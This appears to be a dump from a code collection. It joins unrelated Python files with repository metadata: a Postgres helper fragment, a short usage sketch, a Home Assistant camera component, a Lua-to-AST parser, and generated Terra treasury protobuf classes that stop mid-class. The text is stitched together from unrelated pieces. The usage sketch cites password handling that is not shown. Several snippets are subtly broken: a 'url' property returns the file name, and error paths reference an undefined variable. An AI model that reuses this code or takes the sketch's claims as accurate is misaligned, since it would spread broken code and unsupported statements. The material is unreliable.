if db_exists(url=url, dbname=dbname, admindb=admindb): return # Let's see what we got for the database name. _dbname = dbname # If the caller didn't specify a database name... if not _dbname: # ...let's figure it out from the URL. db: ParseResult = urlparse(url) _dbname = db.path[1:] # Now we can create it. create_db(url=url, dbname=_dbname, admindb=admindb)
2.609375
3
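A hedged usage sketch of the helpers above; the URL and database name are placeholders, the import path is assumed from the record's file location, and it presumes the redacted password handling inside connect() is restored in a real checkout.

from modlit.db.postgres import connect, touch_db  # assumed import path

url = "postgresql://user:password@localhost:5432/mydb"  # placeholder credentials

touch_db(url)  # creates 'mydb' via the 'postgres' admin database only if it is missing
with connect(url, autocommit=True) as cnx:
    with cnx.cursor() as crs:
        crs.execute("SELECT 1")
        print(crs.fetchone()[0])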
estradaspt_legacy/__init__.py
dpjrodrigues/home-assistant-custom-components
0
11887
import logging import async_timeout import urllib.request import time import re from datetime import datetime, timedelta import voluptuous as vol import homeassistant.helpers.config_validation as cv from homeassistant.components.sensor import PLATFORM_SCHEMA from homeassistant.helpers.entity import Entity from homeassistant.helpers.entity_component import EntityComponent from homeassistant.util import Throttle from homeassistant.helpers.aiohttp_client import async_get_clientsession REQUIREMENTS = ['pyEstradasPT==1.0.2'] _LOGGER = logging.getLogger(__name__) ATTRIBUTION = "Powered by estradas.pt" CONF_CAMERA = 'camera' SCAN_INTERVAL = timedelta(minutes=5) DOMAIN = 'estradaspt' PLATFORM_SCHEMA = vol.Schema({ DOMAIN: vol.Schema({ vol.Required(CONF_CAMERA): vol.All(cv.ensure_list, [cv.string]) }) }, extra=vol.ALLOW_EXTRA) async def async_setup(hass, config): """Set up the Camera component""" from pyEstradasPT import Cameras websession = async_get_clientsession(hass) with async_timeout.timeout(10, loop=hass.loop): cameras = await Cameras.get(websession) component = EntityComponent(_LOGGER, DOMAIN, hass) entities = [] conf = config.get(DOMAIN) for camera in conf[0].get(CONF_CAMERA): url = await cameras.UrlByCameraName(camera) file_name='/config/www/'+re.sub('[^A-Za-z0-9]+', '', camera)+'.3gp' entities.append(CameraVideo(camera,file_name,url)) await store_cam_video(url, file_name) await component.async_add_entities(entities) return True async def store_cam_video(url, file_name): """Save camera 3gp """ urllib.request.urlretrieve(url, file_name) class CameraVideo(Entity): """Sensor that reads and stores the camera video.""" ICON = 'mdi:webcam' def __init__(self, name, file_name, url): """Initialize the component.""" self._name = name self._file_name = file_name self._url = url self._last_update = datetime.now() @property def name(self): """Return the name of the component.""" return self._name @property def file_name(self): """Return the file_name where camara was saved.""" return self._file_name @property def url(self): """Return the url of the camera.""" return self._file_name @property def last_update(self): """Return the date when camera url refreshed.""" return self._last_update @property def icon(self): """Icon to use in the frontend, if any.""" return self.ICON @property def device_state_attributes(self): """Return other details about the sensor state.""" attrs = {} attrs["name"] = self._name attrs["last_update"] = self._last_update attrs["file_name"] = self._file_name attrs["url"] = self._url return attrs @Throttle(SCAN_INTERVAL) async def async_update(self): """Update the cam.""" await store_cam_video(self._url, self._file_name) self._last_update = datetime.now() self.schedule_update_ha_state()
2.0625
2
parser.py
boshijingang/PyLuaCompiler
0
11888
<filename>parser.py<gh_stars>0 import lexer import ast class Parser: block_end_tokens = [lexer.TokenKind.KW_RETURN, lexer.TokenKind.EOF, lexer.TokenKind.KW_END, lexer.TokenKind.KW_ELSE, lexer.TokenKind.KW_ELSEIF, lexer.TokenKind.KW_UNTIL] priority_table = { lexer.TokenKind.OP_ADD: {'left': 10, 'right': 10}, # + lexer.TokenKind.OP_SUB: {'left': 10, 'right': 10}, # - lexer.TokenKind.OP_MUL: {'left': 11, 'right': 11}, # * lexer.TokenKind.OP_MOD: {'left': 11, 'right': 11}, # % lexer.TokenKind.OP_DIV: {'left': 11, 'right': 11}, # / lexer.TokenKind.OP_IDIV: {'left': 11, 'right': 11}, # // lexer.TokenKind.OP_POW: {'left': 14, 'right': 13}, # ^ lexer.TokenKind.OP_BAND: {'left': 6, 'right': 6}, # & lexer.TokenKind.OP_BOR: {'left': 4, 'right': 4}, # | lexer.TokenKind.OP_BNOT: {'left': 5, 'right': 5}, # ~ lexer.TokenKind.OP_SHL: {'left': 7, 'right': 7}, # << lexer.TokenKind.OP_SHR: {'left': 7, 'right': 7}, # >> lexer.TokenKind.OP_CONCAT: {'left': 9, 'right': 8}, # .. lexer.TokenKind.OP_EQ: {'left': 3, 'right': 3}, # == lexer.TokenKind.OP_LE: {'left': 3, 'right': 3}, # <= lexer.TokenKind.OP_LT: {'left': 3, 'right': 3}, # < lexer.TokenKind.OP_NE: {'left': 3, 'right': 3}, # ~= lexer.TokenKind.OP_GT: {'left': 3, 'right': 3}, # > lexer.TokenKind.OP_GE: {'left': 3, 'right': 3}, # >= lexer.TokenKind.OP_AND: {'left': 2, 'right': 2}, # and lexer.TokenKind.OP_OR: {'left': 1, 'right': 1}, # or } unops = [ lexer.TokenKind.OP_SUB, lexer.TokenKind.OP_NOT, lexer.TokenKind.OP_LEN, lexer.TokenKind.OP_BNOT ] binops = [ lexer.TokenKind.OP_ADD, lexer.TokenKind.OP_SUB, lexer.TokenKind.OP_MUL, lexer.TokenKind.OP_MOD, lexer.TokenKind.OP_POW, lexer.TokenKind.OP_DIV, lexer.TokenKind.OP_IDIV, lexer.TokenKind.OP_BAND, lexer.TokenKind.OP_BOR, lexer.TokenKind.OP_BXOR, lexer.TokenKind.OP_SHL, lexer.TokenKind.OP_SHR, lexer.TokenKind.OP_CONCAT, lexer.TokenKind.OP_NE, lexer.TokenKind.OP_EQ, lexer.TokenKind.OP_LT, lexer.TokenKind.OP_LE, lexer.TokenKind.OP_GT, lexer.TokenKind.OP_GE, lexer.TokenKind.OP_AND, lexer.TokenKind.OP_OR ] unary_priority = 12 def __init__(self, lex): self.lex = lex def parse(self): block = self.parse_block() self.lex.next_token_of_kind(lexer.TokenKind.EOF) return block # explist ::= exp {‘,’ exp} def parse_exp_list(self): exp_list = [] exp_list.append(self.parse_exp(0)[1]) while self.lex.look_ahead().kind == lexer.TokenKind.SEP_COMMA: self.lex.next_token() exp_list.append(self.parse_exp(0)[1]) return exp_list # exp ::= (simpleexp | unop exp) {binop exp} def parse_exp(self, prev_priority): token = self.lex.look_ahead() if token.kind in self.unops: self.lex.next_token() op_left = ast.UnopExp(self.parse_exp(self.unary_priority)[1], token.kind) else: op_left = self.parse_simple_exp() bin_op = self.lex.look_ahead().kind while bin_op in self.binops and self.priority_table[bin_op]['left'] > prev_priority: bin_op, op_left = self.parse_binop_exp(op_left, self.priority_table[bin_op]['right']) return bin_op, op_left # args ::= ‘(’ [explist] ‘)’ | tableconstructor | LiteralString # tableconstructor ::= ‘{’ [fieldlist] ‘}’ def parse_func_args(self): look_token = self.lex.look_ahead() exp_list = [] if look_token.kind == lexer.TokenKind.SEP_LPAREN: self.lex.next_token() if self.lex.look_ahead().kind != lexer.TokenKind.SEP_RPAREN: exp_list = self.parse_exp_list() self.lex.next_token_of_kind(lexer.TokenKind.SEP_RPAREN) elif look_token.kind == lexer.TokenKind.SEP_LCURLY: exp_list = [self.parse_table_constructor_exp()] else: exp_list = [ast.String(self.lex.next_token_of_kind(lexer.TokenKind.STRING)).data] return exp_list # 
simpleexp ::= nil | false | true | Numeral | LiteralString | ‘...’ | # functiondef | prefixexp | tableconstructor def parse_simple_exp(self): look_token = self.lex.look_ahead() if look_token.kind == lexer.TokenKind.KW_NIL: self.lex.next_token() return ast.NilExp() elif look_token.kind == lexer.TokenKind.KW_FALSE: self.lex.next_token() return ast.BoolConstExp(False) elif look_token.kind == lexer.TokenKind.KW_TRUE: self.lex.next_token() return ast.BoolConstExp(True) elif look_token.kind == lexer.TokenKind.NUMBER: return self.parse_number_exp() elif look_token.kind == lexer.TokenKind.STRING: self.lex.next_token() return ast.StringExp(look_token.data) elif look_token.kind == lexer.TokenKind.VARARG: self.lex.next_token() return ast.VarargExp() elif look_token.kind == lexer.TokenKind.KW_FUNCTION: return self.parse_func_def_exp() elif look_token.kind == lexer.TokenKind.SEP_LCURLY: return self.parse_table_constructor_exp() else: return self.parse_prefix_exp() def parse_func_def_exp(self): self.lex.next_token_of_kind(lexer.TokenKind.KW_FUNCTION) func_body_exp = self.parse_func_body_exp(False) return func_body_exp # tableconstructor ::= ‘{’ [fieldlist] ‘}’ def parse_table_constructor_exp(self): self.lex.next_token_of_kind(lexer.TokenKind.SEP_LCURLY) if self.lex.look_ahead().kind != lexer.TokenKind.SEP_RCURLY: key_list, val_list = self.parse_field_list() else: key_list = [] val_list = [] self.lex.next_token_of_kind(lexer.TokenKind.SEP_RCURLY) return ast.TableConstructorExp(key_list, val_list) # fieldlist ::= field {fieldsep field} [fieldsep] # fieldsep ::= ‘,’ | ‘;’ def parse_field_list(self): key, val = self.parse_field() key_list = [key] val_list = [val] while self.lex.look_ahead().kind in [lexer.TokenKind.SEP_COMMA, lexer.TokenKind.SEP_SEMI]: self.lex.next_token() if self.lex.look_ahead().kind == lexer.TokenKind.SEP_RCURLY: break else: key, val = self.parse_field() key_list.append(key) val_list.append(val) return key_list, val_list # field ::= ‘[’ exp ‘]’ ‘=’ exp | Name ‘=’ exp | exp def parse_field(self): if self.lex.look_ahead().kind == lexer.TokenKind.SEP_LBRACK: self.lex.next_token() key_exp = self.parse_exp(0)[1] self.lex.next_token_of_kind(lexer.TokenKind.SEP_RBRACK) self.lex.next_token_of_kind(lexer.TokenKind.OP_ASSIGN) val_exp = self.parse_exp(0)[1] return key_exp, val_exp exp = self.parse_exp(0)[1] if self.lex.look_ahead().kind == lexer.TokenKind.OP_ASSIGN: if not isinstance(exp, ast.NameExp): raise Exception("syntax error near '%s'" % token) self.lex.next_token() key_exp = ast.StringExp(exp.id_name) val_exp = self.parse_exp(0)[1] return key_exp, val_exp return ast.NilExp(), exp # binop exp def parse_binop_exp(self, op_left, prev_priority): token = self.lex.next_token() if token.kind not in self.binops: raise Exception("syntax error near '%s'" % token) bin_op, op_right = self.parse_exp(prev_priority) return bin_op, ast.BinopExp(op_left, op_right, token.kind) def parse_number_exp(self): token = self.lex.next_token_of_kind(lexer.TokenKind.NUMBER) val = eval(token.data) if isinstance(val, int): return ast.IntegerExp(val) else: return ast.FloatExp(val) # retstat ::= return [explist] [‘;’] def parse_retstat(self): self.lex.next_token_of_kind(lexer.TokenKind.KW_RETURN) exp_list = [] token = self.lex.look_ahead() if not self.is_block_end(token.kind) and token.kind != lexer.TokenKind.SEP_SEMI: exp_list = self.parse_exp_list() return ast.RetStat(exp_list) # block ::= {stat} [retstat] def parse_block(self): stats = self.parse_stats() block = ast.Block(stats) if self.lex.look_ahead().kind == 
lexer.TokenKind.KW_RETURN: retstat = self.parse_retstat() block.append_stat(retstat) return block def parse_goto_stat(self): self.lex.next_token_of_kind(lexer.TokenKind.KW_GOTO) label = self.lex.next_token_of_kind(lexer.TokenKind.IDENTIFIER) return ast.GotoStat(label) def parse_do_stat(self): self.lex.next_token_of_kind(lexer.TokenKind.KW_DO) block = self.parse_block() self.lex.next_token_of_kind(lexer.TokenKind.KW_END) return ast.DoStat(block) def parse_while_stat(self): self.lex.next_token_of_kind(lexer.TokenKind.KW_WHILE) exp = self.parse_exp(0)[1] self.lex.next_token_of_kind(lexer.TokenKind.KW_DO) block = self.parse_block() self.lex.next_token_of_kind(lexer.TokenKind.KW_END) return ast.WhileStat(exp, block) def parse_repeat_stat(self): self.lex.next_token_of_kind(lexer.TokenKind.KW_REPEAT) block = self.parse_block() self.lex.next_token_of_kind(lexer.TokenKind.KW_UNTIL) exp = self.parse_exp(0)[1] return ast.RepeatStat(exp, block) def parse_if_stat(self): exp_list = [] block_list = [] self.lex.next_token_of_kind(lexer.TokenKind.KW_IF) exp = self.parse_exp(0)[1] exp_list.append(exp) self.lex.next_token_of_kind(lexer.TokenKind.KW_THEN) block = self.parse_block() block_list.append(block) while self.lex.look_ahead().kind == lexer.TokenKind.KW_ELSEIF: self.lex.next_token_of_kind(lexer.TokenKind.KW_ELSEIF) exp_list.append(self.parse_exp(0)[1]) self.lex.next_token_of_kind(lexer.TokenKind.KW_THEN) block_list.append(self.parse_block()) if self.lex.look_ahead().kind == lexer.TokenKind.KW_ELSE: self.lex.next_token_of_kind(lexer.TokenKind.KW_ELSE) exp_list.append(ast.BoolConstExp(True)) block_list.append(self.parse_block()) self.lex.next_token_of_kind(lexer.TokenKind.KW_END) return ast.IfStat(exp_list, block_list) def parse_for_stat(self): self.lex.next_token_of_kind(lexer.TokenKind.KW_FOR) name = ast.NameExp(self.lex.next_token_of_kind(lexer.TokenKind.IDENTIFIER).data) if self.lex.look_ahead().kind == lexer.TokenKind.OP_ASSIGN: return self.finish_for_num_stat(name) else: return self.finish_for_in_stat(name) def finish_for_num_stat(self, var): self.lex.next_token_of_kind(lexer.TokenKind.OP_ASSIGN) init_exp = self.parse_exp(0)[1] self.lex.next_token_of_kind(lexer.TokenKind.SEP_COMMA) limit_exp = self.parse_exp(0)[1] step_exp = None if self.lex.look_ahead().kind == lexer.TokenKind.SEP_COMMA: self.lex.next_token() step_exp = self.parse_exp(0)[1] self.lex.next_token_of_kind(lexer.TokenKind.KW_DO) block = self.parse_block() self.lex.next_token_of_kind(lexer.TokenKind.KW_END) return ast.ForNumStat(var, init_exp, limit_exp, step_exp, block) def finish_for_in_stat(self, name): var_list = self.parse_name_list(name) self.lex.next_token_of_kind(lexer.TokenKind.KW_IN) exp_list = self.parse_exp_list() self.lex.next_token_of_kind(lexer.TokenKind.KW_DO) block = self.parse_block() self.lex.next_token_of_kind(lexer.TokenKind.KW_END) return ast.ForInStat(var_list, exp_list, block) def parse_func_def_stat(self): self.lex.next_token_of_kind(lexer.TokenKind.KW_FUNCTION) func_name_exp, has_colon = self.parse_func_name_exp() func_body_exp = self.parse_func_body_exp(has_colon) return ast.AssignStat([func_name_exp], [func_body_exp]) # parlist ::= namelist [‘,’ ‘...’] | ‘...’ # namelist ::= Name {‘,’ Name} def parse_parlist(self): parlist = [] is_var_arg = False if self.lex.look_ahead().kind == lexer.TokenKind.SEP_RPAREN: return parlist, is_var_arg if self.lex.look_ahead().kind == lexer.TokenKind.VARARG: is_var_arg = True self.lex.next_token() return parlist, is_var_arg 
parlist.append(ast.StringExp(self.lex.next_token_of_kind(lexer.TokenKind.IDENTIFIER).data)) while self.lex.look_ahead().kind == lexer.TokenKind.SEP_COMMA: self.lex.next_token() if self.lex.look_ahead().kind == lexer.TokenKind.IDENTIFIER: parlist.append(ast.StringExp(self.lex.next_token_of_kind(lexer.TokenKind.IDENTIFIER).data)) else: self.lex.next_token_of_kind(lexer.TokenKind.VARARG) is_var_arg = True break return parlist, is_var_arg # funcbody ::= ‘(’ [parlist] ‘)’ block end def parse_func_body_exp(self, has_colon): self.lex.next_token_of_kind(lexer.TokenKind.SEP_LPAREN) parlist, is_var_arg = self.parse_parlist() self.lex.next_token_of_kind(lexer.TokenKind.SEP_RPAREN) if has_colon: parlist.insert(0, ast.StringExp('self')) body = self.parse_block() self.lex.next_token_of_kind(lexer.TokenKind.KW_END) return ast.FunctionDefExp(parlist, is_var_arg, body) # funcname ::= Name {‘.’ Name} [‘:’ Name] def parse_func_name_exp(self): has_colon = False name_exp = ast.NameExp(self.lex.next_token_of_kind(lexer.TokenKind.IDENTIFIER).data) while self.lex.look_ahead().kind == lexer.TokenKind.SEP_DOT: self.lex.next_token() name_exp = ast.TableAccessExp(name_exp, ast.StringExp(self.lex.next_token_of_kind(lexer.TokenKind.IDENTIFIER).data)) if self.lex.look_ahead().kind == lexer.TokenKind.SEP_COLON: self.lex.next_token() name_exp = ast.TableAccessExp(name_exp, ast.StringExp(self.lex.next_token_of_kind(lexer.TokenKind.IDENTIFIER).data)) has_colon = True return name_exp, has_colon def parse_local_def_stat(self): self.lex.next_token_of_kind(lexer.TokenKind.KW_LOCAL) if self.lex.look_ahead().kind == lexer.TokenKind.KW_FUNCTION: return self.parse_local_func_def_stat() else: return self.parse_local_var_decl_stat() # namelist ::= Name {‘,’ Name} def parse_name_list(self, name=None): if name: var_list = [name] else: var_list = [ast.StringExp(self.lex.next_token_of_kind(lexer.TokenKind.IDENTIFIER).data)] while self.lex.look_ahead().kind == lexer.TokenKind.SEP_COMMA: self.lex.next_token() var_list.append(ast.StringExp(self.lex.next_token_of_kind(lexer.TokenKind.IDENTIFIER).data)) return var_list # local function Name funcbody def parse_local_func_def_stat(self): self.lex.next_token_of_kind(lexer.TokenKind.KW_FUNCTION) var_list = [ast.StringExp(self.lex.next_token_of_kind(lexer.TokenKind.IDENTIFIER).data)] exp_list = [self.parse_func_body_exp(False)] return ast.LocalDeclStat(var_list, exp_list) # local namelist [‘=’ explist] def parse_local_var_decl_stat(self): var_list = self.parse_name_list() exp_list = [] if self.lex.look_ahead().kind == lexer.TokenKind.OP_ASSIGN: self.lex.next_token_of_kind(lexer.TokenKind.OP_ASSIGN) exp_list = self.parse_exp_list() return ast.LocalDeclStat(var_list, exp_list) # var ::= Name | prefixexp ‘[’ exp ‘]’ | prefixexp ‘.’ Name # functioncall ::= prefixexp args | prefixexp ‘:’ Name args # prefixexp ::= var | functioncall | ‘(’ exp ‘)’ # prefixexp ::= prefixexp args # | prefixexp ‘:’ Name args # | prefixexp ‘[’ exp ‘]’ # | prefixexp ‘.’ Name # | ‘(’ exp ‘)’ # | Name # args ::= ‘(’ [explist] ‘)’ | tableconstructor | LiteralString # tableconstructor ::= ‘{’ [fieldlist] ‘}’ def parse_prefix_exp(self): look_token = self.lex.look_ahead() if look_token.kind == lexer.TokenKind.SEP_LPAREN: self.lex.next_token() exp = self.parse_exp(0)[1] self.lex.next_token_of_kind(lexer.TokenKind.SEP_RPAREN) else: name = self.lex.next_token_of_kind(lexer.TokenKind.IDENTIFIER) exp = ast.NameExp(name.data) while True: look_token = self.lex.look_ahead() if look_token.kind == lexer.TokenKind.SEP_DOT: 
self.lex.next_token() idx_exp = ast.StringExp(self.lex.next_token_of_kind(lexer.TokenKind.IDENTIFIER).data) exp = ast.TableAccessExp(exp, idx_exp) elif look_token.kind == lexer.TokenKind.SEP_COLON: self.lex.next_token() args_exp = [exp] idx_exp = ast.StringExp(self.lex.next_token_of_kind(lexer.TokenKind.IDENTIFIER).data) exp = ast.TableAccessExp(exp, idx_exp) args_exp.extend(self.parse_func_args()) exp = ast.FunctionCallExp(exp, args_exp) elif look_token.kind in [lexer.TokenKind.SEP_LPAREN, lexer.TokenKind.SEP_LCURLY, lexer.TokenKind.STRING]: args_exp = self.parse_func_args() exp = ast.FunctionCallExp(exp, args_exp) elif look_token.kind == lexer.TokenKind.SEP_LBRACK: self.lex.next_token() idx_exp = self.parse_exp(0)[1] exp = ast.TableAccessExp(exp, idx_exp) self.lex.next_token_of_kind(lexer.TokenKind.SEP_RBRACK) else: break return exp # varlist ‘=’ explist # functioncall def parse_assign_or_func_call_stat(self): exp = self.parse_prefix_exp() look_token = self.lex.look_ahead() if look_token.kind in [lexer.TokenKind.OP_ASSIGN, lexer.TokenKind.SEP_COMMA]: return self.finsh_assign_stat(exp) elif isinstance(exp, ast.FunctionCallExp): return exp else: raise Exception("syntax error near '%s'" % look_token) def check_var(self, exp): if isinstance(exp, ast.TableAccessExp) or isinstance(exp, ast.NameExp): return exp raise Exception("syntax error near '%s'" % token) # varlist ‘=’ explist # varlist ::= var {‘,’ var} # var ::= Name | prefixexp ‘[’ exp ‘]’ | prefixexp ‘.’ Name def finsh_assign_stat(self, first_var): var_list = [first_var] while self.lex.look_ahead().kind == lexer.TokenKind.SEP_COMMA: self.lex.next_token() var_list.append(self.check_var(self.parse_prefix_exp())) self.lex.next_token_of_kind(lexer.TokenKind.OP_ASSIGN) exp_list = self.parse_exp_list() return ast.AssignStat(var_list, exp_list) """ stat ::= ‘;’ | break | ::Name:: | goto Name | do block end | while exp do block end | repeat block until exp | if exp then block {elseif exp then block} [else block] end | for Name ‘=’ exp ‘,’ exp [‘,’ exp] do block end | for namelist in explist do block end | function funcname funcbody | local function Name funcbody | local namelist [‘=’ explist] varlist ‘=’ explist | functioncall """ def parse_stat(self): token = self.lex.look_ahead() if token.kind == lexer.TokenKind.SEP_SEMI: return self.parse_empty_stat() elif token.kind == lexer.TokenKind.KW_BREAK: return self.parse_break_stat() elif token.kind == lexer.TokenKind.SEP_LABEL: return self.parse_label_stat() elif token.kind == lexer.TokenKind.KW_GOTO: return self.parse_goto_stat() elif token.kind == lexer.TokenKind.KW_DO: return self.parse_do_stat() elif token.kind == lexer.TokenKind.KW_WHILE: return self.parse_while_stat() elif token.kind == lexer.TokenKind.KW_REPEAT: return self.parse_repeat_stat() elif token.kind == lexer.TokenKind.KW_IF: return self.parse_if_stat() elif token.kind == lexer.TokenKind.KW_FOR: return self.parse_for_stat() elif token.kind == lexer.TokenKind.KW_FUNCTION: return self.parse_func_def_stat() elif token.kind == lexer.TokenKind.KW_LOCAL: return self.parse_local_def_stat() else: return self.parse_assign_or_func_call_stat() def parse_empty_stat(self): self.lex.next_token_of_kind(lexer.TokenKind.SEP_SEMI) def parse_break_stat(self): self.lex.next_token_of_kind(lexer.TokenKind.KW_BREAK) return ast.BreakStat() def parse_label_stat(self): self.lex.next_token_of_kind(lexer.TokenKind.SEP_LABEL) label = self.lex.next_token_of_kind(lexer.TokenKind.IDENTIFIER) self.lex.next_token_of_kind(lexer.TokenKind.SEP_LABEL) return 
ast.LabelStat(label) def parse_stats(self): stats = [] while not self.is_block_end(self.lex.look_ahead().kind): stat = self.parse_stat() if stat: stats.append(stat) return stats def is_block_end(self, kind): if kind in self.block_end_tokens: return True return False
2.453125
2
python/terra_proto/terra/treasury/v1beta1/__init__.py
Vritra4/terra.proto
0
11889
# Generated by the protocol buffer compiler. DO NOT EDIT! # sources: terra/treasury/v1beta1/genesis.proto, terra/treasury/v1beta1/query.proto, terra/treasury/v1beta1/treasury.proto # plugin: python-betterproto from dataclasses import dataclass from typing import Dict, List import betterproto from betterproto.grpc.grpclib_server import ServiceBase import grpclib @dataclass(eq=False, repr=False) class Params(betterproto.Message): """Params defines the parameters for the oracle module.""" tax_policy: "PolicyConstraints" = betterproto.message_field(1) reward_policy: "PolicyConstraints" = betterproto.message_field(2) seigniorage_burden_target: str = betterproto.string_field(3) mining_increment: str = betterproto.string_field(4) window_short: int = betterproto.uint64_field(5) window_long: int = betterproto.uint64_field(6) window_probation: int = betterproto.uint64_field(7) @dataclass(eq=False, repr=False) class PolicyConstraints(betterproto.Message): """ PolicyConstraints - defines policy constraints can be applied in tax & reward policies """ rate_min: str = betterproto.string_field(1) rate_max: str = betterproto.string_field(2) cap: "___cosmos_base_v1_beta1__.Coin" = betterproto.message_field(3) change_rate_max: str = betterproto.string_field(4) @dataclass(eq=False, repr=False) class EpochTaxProceeds(betterproto.Message): """ EpochTaxProceeds represents the tax amount collected at the current epoch """ tax_proceeds: List["___cosmos_base_v1_beta1__.Coin"] = betterproto.message_field(1) @dataclass(eq=False, repr=False) class EpochInitialIssuance(betterproto.Message): """ EpochInitialIssuance represents initial issuance of the currrent epoch """ issuance: List["___cosmos_base_v1_beta1__.Coin"] = betterproto.message_field(1) @dataclass(eq=False, repr=False) class QueryTaxRateRequest(betterproto.Message): """ QueryTaxRateRequest is the request type for the Query/TaxRate RPC method. """ pass @dataclass(eq=False, repr=False) class QueryTaxRateResponse(betterproto.Message): """ QueryTaxRateResponse is response type for the Query/TaxRate RPC method. """ tax_rate: str = betterproto.string_field(1) @dataclass(eq=False, repr=False) class QueryTaxCapRequest(betterproto.Message): """ QueryTaxCapRequest is the request type for the Query/TaxCap RPC method. """ # denom defines the denomination to query for. denom: str = betterproto.string_field(1) @dataclass(eq=False, repr=False) class QueryTaxCapResponse(betterproto.Message): """ QueryTaxCapResponse is response type for the Query/TaxCap RPC method. """ tax_cap: str = betterproto.string_field(1) @dataclass(eq=False, repr=False) class QueryTaxCapsRequest(betterproto.Message): """ QueryTaxCapsRequest is the request type for the Query/TaxCaps RPC method. """ pass @dataclass(eq=False, repr=False) class QueryTaxCapsResponseItem(betterproto.Message): """ QueryTaxCapsResponseItem is response item type for the Query/TaxCaps RPC method. """ denom: str = betterproto.string_field(1) tax_cap: str = betterproto.string_field(2) @dataclass(eq=False, repr=False) class QueryTaxCapsResponse(betterproto.Message): """ QueryTaxCapsResponse is response type for the Query/TaxCaps RPC method. """ tax_caps: List["QueryTaxCapsResponseItem"] = betterproto.message_field(1) @dataclass(eq=False, repr=False) class QueryRewardWeightRequest(betterproto.Message): """ QueryRewardWeightRequest is the request type for the Query/RewardWeight RPC method. 
""" pass @dataclass(eq=False, repr=False) class QueryRewardWeightResponse(betterproto.Message): """ QueryRewardWeightResponse is response type for the Query/RewardWeight RPC method. """ reward_weight: str = betterproto.string_field(1) @dataclass(eq=False, repr=False) class QueryTaxProceedsRequest(betterproto.Message): """ QueryTaxProceedsRequest is the request type for the Query/TaxProceeds RPC method. """ pass @dataclass(eq=False, repr=False) class QueryTaxProceedsResponse(betterproto.Message): """ QueryTaxProceedsResponse is response type for the Query/TaxProceeds RPC method. """ tax_proceeds: List["___cosmos_base_v1_beta1__.Coin"] = betterproto.message_field(1) @dataclass(eq=False, repr=False) class QuerySeigniorageProceedsRequest(betterproto.Message): """ QuerySeigniorageProceedsRequest is the request type for the Query/SeigniorageProceeds RPC method. """ pass @dataclass(eq=False, repr=False) class QuerySeigniorageProceedsResponse(betterproto.Message): """ QuerySeigniorageProceedsResponse is response type for the Query/SeigniorageProceeds RPC method. """ seigniorage_proceeds: str = betterproto.string_field(1) @dataclass(eq=False, repr=False) class QueryIndicatorsRequest(betterproto.Message): """ QueryIndicatorsRequest is the request type for the Query/Indicators RPC method. """ pass @dataclass(eq=False, repr=False) class QueryIndicatorsResponse(betterproto.Message): """ QueryIndicatorsResponse is response type for the Query/Indicators RPC method. """ trl_year: str = betterproto.string_field(1) trl_month: str = betterproto.string_field(2) @dataclass(eq=False, repr=False) class QueryParamsRequest(betterproto.Message): """ QueryParamsRequest is the request type for the Query/Params RPC method. """ pass @dataclass(eq=False, repr=False) class QueryParamsResponse(betterproto.Message): """ QueryParamsResponse is the response type for the Query/Params RPC method. """ # params defines the parameters of the module. 
params: "Params" = betterproto.message_field(1) @dataclass(eq=False, repr=False) class GenesisState(betterproto.Message): """GenesisState defines the oracle module's genesis state.""" params: "Params" = betterproto.message_field(1) tax_rate: str = betterproto.string_field(2) reward_weight: str = betterproto.string_field(3) tax_caps: List["TaxCap"] = betterproto.message_field(4) tax_proceeds: List["___cosmos_base_v1_beta1__.Coin"] = betterproto.message_field(5) epoch_initial_issuance: List[ "___cosmos_base_v1_beta1__.Coin" ] = betterproto.message_field(6) epoch_states: List["EpochState"] = betterproto.message_field(7) @dataclass(eq=False, repr=False) class TaxCap(betterproto.Message): """TaxCap is the max tax amount can be charged for the given denom""" denom: str = betterproto.string_field(1) tax_cap: str = betterproto.string_field(2) @dataclass(eq=False, repr=False) class EpochState(betterproto.Message): """EpochState is the record for each epoch state""" epoch: int = betterproto.uint64_field(1) tax_reward: str = betterproto.string_field(2) seigniorage_reward: str = betterproto.string_field(3) total_staked_luna: str = betterproto.string_field(4) class QueryStub(betterproto.ServiceStub): async def tax_rate(self) -> "QueryTaxRateResponse": request = QueryTaxRateRequest() return await self._unary_unary( "/terra.treasury.v1beta1.Query/TaxRate", request, QueryTaxRateResponse ) async def tax_cap(self, *, denom: str = "") -> "QueryTaxCapResponse": request = QueryTaxCapRequest() request.denom = denom return await self._unary_unary( "/terra.treasury.v1beta1.Query/TaxCap", request, QueryTaxCapResponse ) async def tax_caps(self) -> "QueryTaxCapsResponse": request = QueryTaxCapsRequest() return await self._unary_unary( "/terra.treasury.v1beta1.Query/TaxCaps", request, QueryTaxCapsResponse ) async def reward_weight(self) -> "QueryRewardWeightResponse": request = QueryRewardWeightRequest() return await self._unary_unary( "/terra.treasury.v1beta1.Query/RewardWeight", request, QueryRewardWeightResponse, ) async def seigniorage_proceeds(self) -> "QuerySeigniorageProceedsResponse": request = QuerySeigniorageProceedsRequest() return await self._unary_unary( "/terra.treasury.v1beta1.Query/SeigniorageProceeds", request, QuerySeigniorageProceedsResponse, ) async def tax_proceeds(self) -> "QueryTaxProceedsResponse": request = QueryTaxProceedsRequest() return await self._unary_unary( "/terra.treasury.v1beta1.Query/TaxProceeds", request, QueryTaxProceedsResponse, ) async def indicators(self) -> "QueryIndicatorsResponse": request = QueryIndicatorsRequest() return await self._unary_unary( "/terra.treasury.v1beta1.Query/Indicators", request, QueryIndicatorsResponse ) async def params(self) -> "QueryParamsResponse": request = QueryParamsRequest() return await self._unary_unary( "/terra.treasury.v1beta1.Query/Params", request, QueryParamsResponse ) class QueryBase(ServiceBase): async def tax_rate(self) -> "QueryTaxRateResponse": raise grpclib.GRPCError(grpclib.const.Status.UNIMPLEMENTED) async def tax_cap(self, denom: str) -> "QueryTaxCapResponse": raise grpclib.GRPCError(grpclib.const.Status.UNIMPLEMENTED) async def tax_caps(self) -> "QueryTaxCapsResponse": raise grpclib.GRPCError(grpclib.const.Status.UNIMPLEMENTED) async def reward_weight(self) -> "QueryRewardWeightResponse": raise grpclib.GRPCError(grpclib.const.Status.UNIMPLEMENTED) async def seigniorage_proceeds(self) -> "QuerySeigniorageProceedsResponse": raise grpclib.GRPCError(grpclib.const.Status.UNIMPLEMENTED) async def tax_proceeds(self) -> 
